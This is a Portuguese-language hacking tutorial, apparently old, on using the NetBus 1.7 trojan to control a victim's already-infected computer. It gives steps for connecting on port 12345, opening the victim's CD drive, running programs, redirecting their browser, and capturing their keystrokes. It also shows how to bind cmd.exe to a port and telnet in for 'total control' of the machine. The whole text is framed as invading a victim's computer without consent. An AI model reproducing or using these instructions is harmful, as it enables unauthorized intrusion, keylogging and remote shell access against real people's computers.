Vamos utilizar um trojan para nos conectarmos a algum computador infectado. Antes de tudo, verifique se o computador alvo estí com o servidor instalado.
Primeiro Trojan Que Iremos Ver, Serí o Classico NetBus 1.7
Vamos La:
- Depois de Infectar o Comp. da Vitima com o Server do NetBus, Siga o Tutorial:
1. Abra o programa Netbus (se o anti-vàrus acusar vàrus, passe o petite nele também)
2. Em hostname / IP , coloque o IP da míquina a ser invadida (se for seu próprio computador, utilize 127.0.0.1). Se a porta no servidor for diferente de 12345 (o padrão do Netbus), coloque-a em port.
3. Clique em connect!
Ao aparecer a mensagem ?Connected? na barra de status, significa que a invasão foi bem sucedida. Vamos agora realizar algumas ações:
1. Clique em Open CD-ROM para abrir o drive de cd da vàtima.
2. Ví em Start Program e coloque c:\windows\calc.exe para abrir a calculadora.
3. Clique em Go to URL e mande a pessoa para algum site.
4. Use Listen para pegar os caracteres digitados pela pessoa e intervir no meio (como se você estivesse escrevendo no Word e de repente as palavras se formam sozinhas).
5. A Port Redirect cria uma ponte. Coloque uma porta (geralmente use a 80) e um site. Assim quando for ao Internet Explorer e digitar o IP do computador invadido, você cairí nesse site configurado. Por exemplo: ao digitar 127.0.0.1 no browser fui enviado para http://www.whitehouse.gov.
6. Dí para fuçar bem nas opções, mas a mais interessante é a App Redirect. Abra-a, coloque uma porta qualquer (100 por exemplo) e mande executar um shell nessa porta (no caso do Windows 95, 98 e ME, use c:\command.com , no NT, 2000 e XP use cmd.exe). Agora utilize o telnet (ví em iniciar/ executar e digite: telnet 127.0.0.1 100 , trocando o endereço ip padrão pelo da vàtima) e pronto. Você estí no prompt do MS-DOS da pessoa. Têm o controle total da míquina.
7. Para desconectar, apenas clique em disconnect.
8. A opção server admin retira o servidor.
